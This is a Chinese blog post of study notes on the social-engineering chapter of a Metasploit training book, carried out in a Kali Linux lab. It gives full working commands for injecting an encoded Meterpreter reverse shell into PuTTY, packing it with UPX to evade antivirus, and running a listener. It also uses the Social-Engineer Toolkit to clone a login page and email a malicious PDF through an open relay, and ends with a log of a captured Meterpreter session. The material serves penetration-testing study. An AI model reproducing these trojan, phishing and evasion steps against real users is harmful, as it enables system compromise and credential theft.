《Metasploit 魔鬼训练营》07 社会工程学

最新推荐文章于 2023-05-19 18:44:15 发布
最新推荐文章于 2023-05-19 18:44:15 发布
阅读量2.1k 收藏 6
点赞数
分类专栏: kali-linux
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/Kevinhanser/article/details/78466542
版权

本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程

  1. 伪装木马
  2. 网站钓鱼
  3. 邮件钓鱼

###1.伪装木马 ###

# 生成木马的攻击载荷程序
# 现在已经没有msfpayload的命令了,换成msfvenom了,里面集成了msfpayload和msfencode。
# 一个payload生成器Veil-Evasion 项目地址:https://github.com/Veil-Framework/Veil-Evasion #免杀效果较好
# 要攻击的目标主机是 windows 系统,要有回连至监听主机的能力,并支持后渗透攻击功能
	http://blog.csdn.net/lzhd24/article/details/50664342

root@attacker:~# msfvenom -l | grep windows | grep reverse_tcp | grep meterpreter
    windows/meterpreter/reverse_tcp                     Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_allports            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/meterpreter/reverse_tcp_dns                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_rc4                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_rc4_dns             Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker
    windows/meterpreter/reverse_tcp_uuid                Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged). Connect back to the attacker with UUID Support
    windows/meterpreter_reverse_tcp                     Connect back to attacker and spawn a Meterpreter shell
    windows/patchupmeterpreter/reverse_tcp              Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_allports     Inject the meterpreter server DLL (staged). Try to connect back to the attacker, on all possible ports (1-65535, slowly)
    windows/patchupmeterpreter/reverse_tcp_dns          Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_rc4          Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_rc4_dns      Inject the meterpreter server DLL (staged). Connect back to the attacker
    windows/patchupmeterpreter/reverse_tcp_uuid         Inject the meterpreter server DLL (staged). Connect back to the attacker with UUID Support
    windows/x64/meterpreter/reverse_tcp                 Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker (Windows x64)
    windows/x64/meterpreter/reverse_tcp_uuid            Inject the meterpreter server DLL via the Reflective Dll Injection payload (staged x64). Connect back to the attacker with UUID Support (Windows x64)
    windows/x64/meterpreter_reverse_tcp                 Connect back to attacker and spawn a Meterpreter shell
# 使用第一个 windows/meterpreter/reverse_tcp  
root@attacker:~# msfvenom -h
	MsfVenom - a Metasploit standalone payload generator.
	Also a replacement for msfpayload and msfencode.
	Usage: /usr/bin/msfvenom [options] <var=val>
	Options:
		-p, --payload       <payload>    Payload to use. Specify a '-' or stdin to use custom payloads
			--payload-options            List the payload's standard options
		-l, --list          [type]       List a module type. Options are: payloads, encoders, nops, all
		-n, --nopsled       <length>     Prepend a nopsled of [length] size on to the payload
		-f, --format        <format>     Output format (use --help-formats for a list)
			--help-formats               List available formats
		-e, --encoder       <encoder>    The encoder to use
		-a, --arch          <arch>       The architecture to use
			--platform      <platform>   The platform of the payload
			--help-platforms             List available platforms
		-s, --space         <length>     The maximum size of the resulting payload
			--encoder-space <length>     The maximum size of the encoded payload (defaults to the -s value)
		-b, --bad-chars     <list>       The list of characters to avoid example: '\x00\xff'
		-i, --iterations    <count>      The number of times to encode the payload
		-c, --add-code      <path>       Specify an additional win32 shellcode file to include
		-x, --template      <path>       Specify a custom executable file to use as a template
		-k, --keep                       Preserve the template behavior and inject the payload as a new thread
		-o, --out           <path>       Save the payload
		-v, --var-name      <name>       Specify a custom variable name to use for certain output formats
			--smallest                   Generate the smallest possible payload
		-h, --help                       Show this message

		#先测试一下:
#root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -f exe -o payload.exe
#root@attacker:~# ll payload.exe 
#	-rw-r--r-- 1 root root 73802 Sep 22 00:10 payload.exe

# 给 putty 程序注入病毒
root@attacker:~# ll putty_0367.exe 
	-rw-r--r-- 1 root root 531368 9月  22 00:17 putty_0367.exe
root@attacker:~# msfvenom -p windows/meterpreter/reverse_tcp LHOST=10.10.10.128 LPORT=4444 -a x86 --platform windows -e x86/shikata_ga_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
	a_nai -i 3 -x putty_0367.exe -f exe -o putty_evil.exe
	Found 1 compatible encoders
	Attempting to encode payload with 3 iterations of x86/shikata_ga_nai
	x86/shikata_ga_nai succeeded with size 360 (iteration=0)
	x86/shikata_ga_nai succeeded with size 387 (iteration=1)
	x86/shikata_ga_nai succeeded with size 414 (iteration=2)
	x86/shikata_ga_nai chosen with final size 414
	Payload size: 414 bytes
	Final size of exe file: 531368 bytes
	Saved as: putty_evil.exe
root@attacker:~# ll putty_*
	-rw-r--r-- 1 root root 531368 9月  22 00:17 putty_0367.exe
	-rw-r--r-- 1 root root 531368 9月  22 00:21 putty_evil.exe

# 将文件植入 windows 之后
msf > use exploit/multi/handler
msf exploit(handler) > set payload windows/meterpreter/reverse_tcp
	payload => windows/meterpreter/reverse_tcp
msf exploit(handler) > show options 
	Module options (exploit/multi/handler):
	   Name  Current Setting  Required  Description
	   ----  ---------------  --------  -----------
	Payload options (windows/meterpreter/reverse_tcp):
	   Name      Current Setting  Required  Description
	   ----      ---------------  --------  -----------
	   EXITFUNC  process          yes       Exit technique (Accepted: '', seh, thread, process, none)
	   LHOST                      yes       The listen address
	   LPORT     4444             yes       The listen port
	Exploit target:

	   Id  Name
	   --  ----
	   0   Wildcard Target
msf exploit(handler) > set LHOST 10.10.10.128
	LHOST => 10.10.10.128
msf exploit(handler) > set LPORT 80
	LPORT => 80
msf exploit(handler) > exploit
# 在此监听的情况下,在 windows 端 打开含有病毒的软件,但也会被杀毒软件拦截

# 加壳防查杀
root@attacker:~# upx -6 -o putty_backdoor.exe putty_evil.exe 
						   Ultimate Packer for eXecutables
							  Copyright (C) 1996 - 2013
	UPX 3.91        Markus Oberhumer, Laszlo Molnar & John Reiser   Sep 30th 2013

			File size         Ratio      Format      Name
	   --------------------   ------   -----------   -----------
		531368 ->    397736   74.85%    win32/pe     putty_backdoor.exe            

	Packed 1 file.

###2. 网站钓鱼 ###

	http://www.cnblogs.com/youcanch/articles/5671274.html
root@attacker:~# setoolkit
Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit
set> 1
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.
set> 2
   1) Java Applet Attack Method
   2) Metasploit Browser Exploit Method
   3) Credential Harvester Attack Method
   4) Tabnabbing Attack Method
   5) Web Jacking Attack Method
   6) Multi-Attack Web Method
   7) Full Screen Attack Method
   8) HTA Attack Method

  99) Return to Main Menu
set:webattack>3 
   1) Web Templates
   2) Site Cloner
   3) Custom Import

  99) Return to Webattack Menu
set:webattack>2
	[-] Credential harvester will allow you to utilize the clone capabilities within SET
	[-] to harvest credentials or parameters from a website as well as place them into a report
	[-] This option is used for what IP the server will POST to.
	[-] If you're using an external IP, use your external IP for this
set:webattack> IP address for the POST back in Harvester/Tabnabbing:10.10.10.128
	[-] SET supports both HTTP and HTTPS
	[-] Example: http://www.thisisafakesite.com
set:webattack> Enter the url to clone:http://10.10.10.129/signin.html

###3.邮件钓鱼 ###

root@attacker:~# setoolkit

Select from the menu:

   1) Social-Engineering Attacks
   2) Penetration Testing (Fast-Track)
   3) Third Party Modules
   4) Update the Social-Engineer Toolkit
   5) Update SET configuration
   6) Help, Credits, and About

  99) Exit the Social-Engineer Toolkit

set> 1
Select from the menu:

   1) Spear-Phishing Attack Vectors
   2) Website Attack Vectors
   3) Infectious Media Generator
   4) Create a Payload and Listener
   5) Mass Mailer Attack
   6) Arduino-Based Attack Vector
   7) Wireless Access Point Attack Vector
   8) QRCode Generator Attack Vector
   9) Powershell Attack Vectors
  10) SMS Spoofing Attack Vector
  11) Third Party Modules

  99) Return back to the main menu.

set> 1
   1) Perform a Mass Email Attack
   2) Create a FileFormat Payload
   3) Create a Social-Engineering Template

  99) Return to Main Menu

set:phishing>1
 1) SET Custom Written DLL Hijacking Attack Vector (RAR, ZIP)
   2) SET Custom Written Document UNC LM SMB Capture Attack
   3) MS15-100 Microsoft Windows Media Center MCL Vulnerability
   4) MS14-017 Microsoft Word RTF Object Confusion (2014-04-01)
   5) Microsoft Windows CreateSizedDIBSECTION Stack Buffer Overflow
   6) Microsoft Word RTF pFragments Stack Buffer Overflow (MS10-087)
   7) Adobe Flash Player "Button" Remote Code Execution
   8) Adobe CoolType SING Table "uniqueName" Overflow
   9) Adobe Flash Player "newfunction" Invalid Pointer Use
  10) Adobe Collab.collectEmailInfo Buffer Overflow
  11) Adobe Collab.getIcon Buffer Overflow
  12) Adobe JBIG2Decode Memory Corruption Exploit
  13) Adobe PDF Embedded EXE Social Engineering
  14) Adobe util.printf() Buffer Overflow
  15) Custom EXE to VBA (sent via RAR) (RAR required)
  16) Adobe U3D CLODProgressiveMeshDeclaration Array Overrun
  17) Adobe PDF Embedded EXE Social Engineering (NOJS)
  18) Foxit PDF Reader v4.1.1 Title Stack Buffer Overflow
  19) Apple QuickTime PICT PnSize Buffer Overflow
  20) Nuance PDF Reader v6.0 Launch Stack Buffer Overflow
  21) Adobe Reader u3D Memory Corruption Vulnerability
  22) MSCOMCTL ActiveX Buffer Overflow (ms12-027)

set:payloads>8
   1) Windows Reverse TCP Shell              Spawn a command shell on victim and send back to attacker
   2) Windows Meterpreter Reverse_TCP        Spawn a meterpreter shell on victim and send back to attacker
   3) Windows Reverse VNC DLL                Spawn a VNC server on victim and send back to attacker
   4) Windows Reverse TCP Shell (x64)        Windows X64 Command Shell, Reverse TCP Inline
   5) Windows Meterpreter Reverse_TCP (X64)  Connect back to the attacker (Windows x64), Meterpreter
   6) Windows Shell Bind_TCP (X64)           Execute payload and create an accepting port on remote system
   7) Windows Meterpreter Reverse HTTPS      Tunnel communication over HTTP using SSL and use Meterpreter

set:payloads>2       
set:payloads> Port to connect back on [443]:443
[*] All good! The directories were created.
[-] Generating fileformat exploit...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
[*] Waiting for payload generation to complete (be patient, takes a bit)...
    1. Keep the filename, I don't care.
    2. Rename the file, I want to be cool.

set:phishing>2
set:phishing> New filename:Dvssc_ABC_Project_Status.pdf            

root@attacker:~# cd /root/
root@attacker:~# cd .set/
root@attacker:~/.set# ls
Dvssc_ABC_Project_Status.pdf  payload.options  template.pdf  template.rc
root@attacker:~/.set# ll
总用量 104
-rw-r--r-- 1 root root 46863 9月  25 09:45 Dvssc_ABC_Project_Status.pdf
-rw-r--r-- 1 root root    48 9月  25 09:43 payload.options
-rw-r--r-- 1 root root 46863 9月  25 09:43 template.pdf
-rw-r--r-- 1 root root   150 9月  25 09:43 template.rc
# 查看内容
root@attacker:~/.set# xpdf Dvssc_ABC_Project_Status.pdf 
# 然后用 Adobe Acrobat Pro 处理一下

set:phishing>1

   Do you want to use a predefined template or craft
   a one time email template.

   1. Pre-Defined Template
   2. One-Time Use Email Template
set:phishing>2
set:phishing> Subject of the email:Ki wang
set:phishing> Send the message as html or plain? 'h' or 'p' [p]:p
set:phishing> Enter the body of the message, hit return for a new line. Control+c when finished:Please review the ABC project status report
Next line of the body: wo are behind the school^Cset:phishing> Send email to:wangdongpeng@dvssc.com

  1. Use a gmail Account for your email attack.
  2. Use your own server or open relay

set:phishing>2
set:phishing> From address (ex: moo@example.com):liming@dvssc.com
set:phishing> The FROM NAME user will see:yourname
set:phishing> Username for open-relay [blank]:yourpasswd
Password for open-relay [blank]: 
set:phishing> SMTP email server address (ex. smtp.youremailserveryouown.com):mail.163.com
set:phishing> Port number for the SMTP server [25]:
set:phishing> Flag this message/s as high priority? [yes|no]:yes

# XP打开文件
msf exploit(handler) > 
[*] Sending stage (956991 bytes) to 10.10.10.254
[*] Meterpreter session 1 opened (10.10.10.128:443 -> 10.10.10.254:1037) at 2017-09-25 10:16:52 -0400
sessions -i 1
[*] Starting interaction with 1...

meterpreter > ps

Process List
============

 PID   PPID  Name              Arch  Session  User                           Path
 ---   ----  ----              ----  -------  ----                           ----
 0     0     [System Process]                                                
 4     0     System            x86   0                                       
 240   436   ICQLite.exe       x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\ICQLite\ICQLite.exe
 388   4     smss.exe          x86   0        NT AUTHORITY\SYSTEM            \SystemRoot\System32\smss.exe
 436   1320  explorer.exe      x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\Explorer.EXE
 640   388   csrss.exe         x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\csrss.exe
 664   388   winlogon.exe      x86   0        NT AUTHORITY\SYSTEM            \??\C:\WINDOWS\system32\winlogon.exe
 708   664   services.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\services.exe
 720   664   lsass.exe         x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\lsass.exe
 876   708   vmacthlp.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmacthlp.exe
 892   708   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\svchost.exe
 968   436   msmsgs.exe        x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\Messenger\msmsgs.exe
 972   708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1092  708   svchost.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\System32\svchost.exe
 1148  708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1192  436   ctfmon.exe        x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\ctfmon.exe
 1204  708   svchost.exe       x86   0                                       C:\WINDOWS\system32\svchost.exe
 1276  436   vmtoolsd.exe      x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 1380  708   alg.exe           x86   0                                       C:\WINDOWS\System32\alg.exe
 1428  708   spoolsv.exe       x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\spoolsv.exe
 1576  708   HistorySvr.exe    x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\KingView\HistorySvr.exe
 1588  708   inetinfo.exe      x86   0        NT AUTHORITY\SYSTEM            C:\WINDOWS\system32\inetsrv\inetinfo.exe
 1676  708   sntlkeyssrvr.exe  x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Keys Server\sntlkeyssrvr.exe
 1796  1092  wscntfy.exe       x86   0        DH-CA8822AB9589\Administrator  C:\WINDOWS\system32\wscntfy.exe
 1936  708   spnsrvnt.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\Common Files\SafeNet Sentinel\Sentinel Protection Server\WinNT\spnsrvnt.exe
 1984  708   vmtoolsd.exe      x86   0        NT AUTHORITY\SYSTEM            C:\Program Files\VMware\VMware Tools\vmtoolsd.exe
 2648  436   AcroRd32.exe      x86   0        DH-CA8822AB9589\Administrator  C:\Program Files\Adobe\Reader 9.0\Reader\AcroRd32.exe

meterpreter > migrate 436
[*] Migrating from 2648 to 436...
[*] Migration completed successfully.
meterpreter >
网络安全打工人
关注
  • 0
    点赞
  • 6
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
hackthebox(HTB) Ambassdor !
qq_58869808的博客
12-08 4852
hackthebox(HTB) Ambassdor !
Metasploit_测试魔鬼训练营.zip
09-27
首本中文原创Metasploit渗透测试著作,国内信息安全领域布道者和资深Metasploit渗透测试专家领衔撰写,极具权威性。以实践为导向,既详细讲解了Metasploit渗透测试的技术、流程、方法和技巧,又深刻阐释了渗透测试平台背后蕴含的思想。 本书是Metasploit渗透测试领域难得的经典佳作,由国内信息安全领域的资深Metasploit渗透测试专家领衔撰写。内容系统、广泛、有深度,不仅详细讲解了Metasploit渗透测试的技术、流程、方法和技巧,而且深刻揭示了渗透测试平台背后蕴含的思想。 书中虚拟了两家安全公司,所有内容都围绕这两家安全公司在多个角度的多次“对战”展开,颇具趣味性和可读性。很多知识点都配有案例解析,更重要的是每章还有精心设计的“魔鬼训练营实践作业”,充分体现了“实践,实践,再实践”的宗旨。
TOJ3216 我要4444
weixin_30287169的博客
02-21 4667
传送门 http://acm.tzc.edu.cn/acmhome/problemdetail.do?&method=showdetail&id=3216 时间限制(普通/Java):1000MS/3000MS 内存限制:65536KByte 描述 M国的车牌号只有4位,别人都很想要8888,6666,3333等,但是Mr.L很奇怪,他想要4444…… M国的...
Metasploit 魔鬼训练营》05 网络服务渗透攻击
kevinhanser
11-07 4077
本文记录 Kali Linux 2017.1 学习使用 Metasploit 的详细过程 1. 内存攻防技术 2. MS08-067 攻击案例 3. Oricle 数据库 4. KingView 6.53 HistorySrv 渗透攻击 5. Samba 安全漏洞
本人网站永久域名!
逍遥行工作室
09-08 23万+
最新消息,本站启用永久域名,欢迎大家常来做客 O(∩_∩)O~     目前我的网站子域名如下 主站:http://www.yangping.net 博客:http://blog.yangping.net 论坛:http://bbs.yangping.net 网盘:http://disk.yangping.net
www.akmwzjt.net/index.php,FuseQRCode/index.html at 0221cc7b6cdc5324c71e1e2f67df0e1c466577f0 · Liam02...
热门推荐
weixin_29317963的博客
03-23 36万+
background-image: url("data:image/png;base64,iVBORw0KGgoAAAANSUhEUgAAAUYAAABuCAIAAADUPS1IAAAACXBIWXMAAAsTAAALEwEAmpwYAAAAIGNIUk0AAHolAACAgwAA+f8AAIDpAAB1MAAA6mAAADqYAAAXb5JfxUYAAGwWSURBVHja7L1plJ3VdSZ...
《Vulnhub通关手册》——01 DC-1
weixin_53801131的博客
12-10 4043
​背景概述: 下载地址为:https://www.vulnhub.com/entry/dc-1-1,292/ 本次靶机IP为192.168.2.11 1. 信息收集 1.1 扫描目标主机IP 使用arp-scan进行局域网扫描,使用命令arp-scan -l,扫描结果如下: └─# arp-scan -l Interface: eth0, type: EN10MB, MAC: 00:0c:29:69:27:90, IPv4: 192.168.2.253 Starting arp-
题库-所有
weixin_46941625的博客
08-22 1万+
2019年云计算笔试面试题库 区别: 单引号: 所见即所得 里面的内容会原封不动显示出来 双引号: 会解析里面的变量和特殊符号 反引号: 反引号里面的内容会被优先执行(将里面的输出暂时保存 在适当的地方显示出来) [root@alice ~]# echo ‘$UID’ KaTeX parse error: Expected 'EOF', got '#' at position 19: … [root@alice ~]#̲ echo "UID" 0 [root@alice ~]# echo date Wed
Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap
08-31 500
Kail Linux渗透测试教程之网络扫描和嗅探工具Nmap 网络扫描和嗅探工具——Nmap Nmap也就网络映射器(Network Mapper),是一个免费开放的网络扫描和嗅探工具。该工具可以扫...
Metasploit渗透测试魔鬼训练营 读书笔记
09-18
渗透测试-web渗透6.pdf 渗透测试-内网客户端渗透9.pdf 渗透测试-内网网络服务端渗透7.pdf ... 渗透测试-社会工程学8.pdf 渗透测试-移动环境渗透3.pdf 渗透测试-认识Metesploit2.pdf 渗透测试1.pdf
Metasploit安全工程师必备/学习【魔鬼训练营】 pdf文档
11-09
安全工程师必备/学习
metasploit魔鬼训练营》学习中遇到的相关问题
08-19
在学习《metasploit魔鬼训练营》的过程中,遇到很多的问题,从搭建环境到进行测试,作为一个新手,踩过一些坑,记录下来,以备后查。
Vulnhub靶机渗透:Raven1(超级详细)
Mysmycbx的博客
05-19 7231
发现有个contact.zip,下载下来解压,解压出contact.php,阅读源码。进入vendor文件夹,发现上面找到的phpmailer服务就存在这个文件夹里,翻找一下。在上面的内容中,我们获取到www-data权限,但通过扫描wordpress扫描到存在michael和steven两个用户,那能不能从这两个用户中,得到什么呢?下载下来一个试一试。找到了steven的用户凭据,但这里需要解密,使用john解密。,这里习惯性的使用ssh登录一下,结果成功了。扫描到后台,尝试弱密码登录,发现失败。
Lab - ElasticSearch Search Groovy Sandbox Bypass
Nixawk
03-05 2025
Download: https://www.elastic.co/downloads/past-releases/elasticsearch-1-4-0Elasticsearch is a search server based on Lucene. It provides a distributed, multitenant-capable full-text search engine with
靶机渗透练习96-hacksudo:Thor
hirak0的博客
05-09 1529
靶机描述 靶机地址:https://www.vulnhub.com/entry/hacksudo-thor,733/ Description Box created by vishal Waghmare This box should be easy to medium . This machine was created for the InfoSec Prep Discord Server ( https://discord.gg/kDyAKtJs ) Website (https://hacksud
OpenAI开发AI版《文明》,一块CPU就能重现AI生存战争史
Dream Fly Together
03-19 544
原文链接:https://mp.weixin.qq.com/s?__biz=MzIzNjc1NzUzMw==&mid=2247515805&idx=2&sn=3a3952337ca44448ffc1df0d6e14fa90&chksm=e8d009efdfa780f994f4addec8fdcd882620e4b78b3d6ee59935c8c8d25c839032...
Vulnhub Bsides Vancouver 2018
zhaji001
01-02 3789
简介:  靶机下载URL: https://www.vulnhub.com/entry/bsides-vancouver-2018-workshop,231/#release 虚拟机需要使用Virtualbox 直接导入VM, 攻击机器使用kali linux 如果你为了方便可不使用桥接模式,直接设置VM和kali在同一IP即可。如果在环境中有太多的机器就不太好分辨目标IP。 0x001 信...
Penetration Testing : Applications
cnbird's blog
03-05 2979
http://www.dis9.com/penetration-testing-applications.html Installing: 1 sudo apt-get install nmap nessus openvas-server openvas-client sudo apt-get install nmap
node-v6.9.4-linux-s390x.tar.xz
最新发布
05-09
Node.js,简称Node,是一个开源且跨平台的JavaScript运行时环境,它允许在浏览器外运行JavaScript代码。Node.js于2009年由Ryan Dahl创立,旨在创建高性能的Web服务器和网络应用程序。它基于Google Chrome的V8 JavaScript引擎,可以在Windows、Linux、Unix、Mac OS X等操作系统上运行。 Node.js的特点之一是事件驱动和非阻塞I/O模型,这使得它非常适合处理大量并发连接,从而在构建实时应用程序如在线游戏、聊天应用以及实时通讯服务时表现卓越。此外,Node.js使用了模块化的架构,通过npm(Node package manager,Node包管理器),社区成员可以共享和复用代码,极大地促进了Node.js生态系统的发展和扩张。 Node.js不仅用于服务器端开发。随着技术的发展,它也被用于构建工具链、开发桌面应用程序、物联网设备等。Node.js能够处理文件系统、操作数据库、处理网络请求等,因此,开发者可以用JavaScript编写全栈应用程序,这一点大大提高了开发效率和便捷性。 在实践中,许多大型企业和组织已经采用Node.js作为其Web应用程序的开发平台,如Netflix、PayPal和Walmart等。它们利用Node.js提高了应用性能,简化了开发流程,并且能更快地响应市场需求。
metasploit渗透测试魔鬼训练营
09-03
Metasploit渗透测试魔鬼训练营是一种针对渗透测试人员的培训课程,旨在帮助学员掌握使用Metasploit框架进行渗透测试的技能。该课程包括理论知识和实践操作,涵盖了Metasploit框架的基础知识、漏洞利用、后渗透等内容...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值